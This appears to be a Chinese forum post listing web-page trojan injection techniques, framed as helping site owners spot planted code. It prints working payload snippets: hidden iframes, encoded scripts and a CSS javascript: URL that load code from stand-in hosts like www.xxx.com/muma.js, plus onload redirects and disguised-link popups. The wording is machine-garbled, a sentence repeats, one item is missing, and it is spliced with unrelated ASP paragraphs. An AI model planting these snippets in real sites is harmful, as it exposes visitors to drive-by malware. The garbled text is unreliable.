|
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有帐号?立即注册
x
源代码保护方面其实现在考虑得没那么多了..NET也可以反编译.ASP写得复杂的话别人能看得懂的话.他也有能力自己写了.这方面担心的倒不太多.纵观现在网上可以下载的那些所谓BBS还有什么网站等等的源代码这篇文章指在告知人人好人常常利用的网页挂马体例,从而能够对本人的网页举行提防,只需检测这些常常被用于挂马的中央,很简单找到木马的地点。这篇文章指在告知人人好人常常利用的网页挂马体例,从而能够对本人的网页举行提防,只需检测这些常常被用于挂马的中央,很简单找到木马的地点。
一:框架挂马
<iframesrc=地点width=0height=0></iframe>
个中“地点”处能够输出歹意网站链接等
二:js文件挂马
只需是JS文件,都能够经由过程被歹意修正从而被挂上歹意代码,一样平常被全站援用的JS代码最简单被挂木马,检测我们能够检察JS代码的右边或下边,好人很喜好将歹意代码与一般代码间用良多空格或回车来举行埋没,以是要多看看JS代码页面有无被存心拉长等。
三:js变形加密
<SCRIPTlanguage="JScript.Encode"src=http://www.xxx.com/muma.txt></script>
muma.txt可改成恣意后缀
四:body挂马
<bodyonload="window.location=地点;"></body>
五:潜伏挂马
top.document.body.innerHTML=top.document.body.innerHTML+
<iframesrc="http://www.xxx.com/muma.htm/"></iframe>;
六:CSS中挂马
body{
background-image:url(javascript:document.write("<scriptsrc=http://www.XXX.net/muma.js></script>"))}
这类体例对照狠,也对照难发明。
七:JAJA挂马
<SCRIPTlanguage=javascript>
window.open("地点","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
八:图片假装
<html>
<iframesrc="网马地点"height=0width=0></iframe>
<framesrc="网马地点"frameborder="no"scrolling="no"noresizemarginwidth="0"margingheight="0">
</frameset>
十:初级棍骗
<ahref="http://www.ckuyun.com(利诱毗连地点,显现这个地点指向木马地点)"onMouseOver="www_163_com();returntrue;">页面要显现的内容</a>
<SCRIPTLanguage="JavaScript">
functionwww_163_com()
{
varurl="网马地点";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>
ASP一般认为只能运行在IIS上,正如前面所提到的,这并不是十分正确,事实上,ASP也能运行在Apache上。ApacheASP可在任意Apache服务器上运行有限的ASP功能,所需做的,只需打开mod_perl。 |
|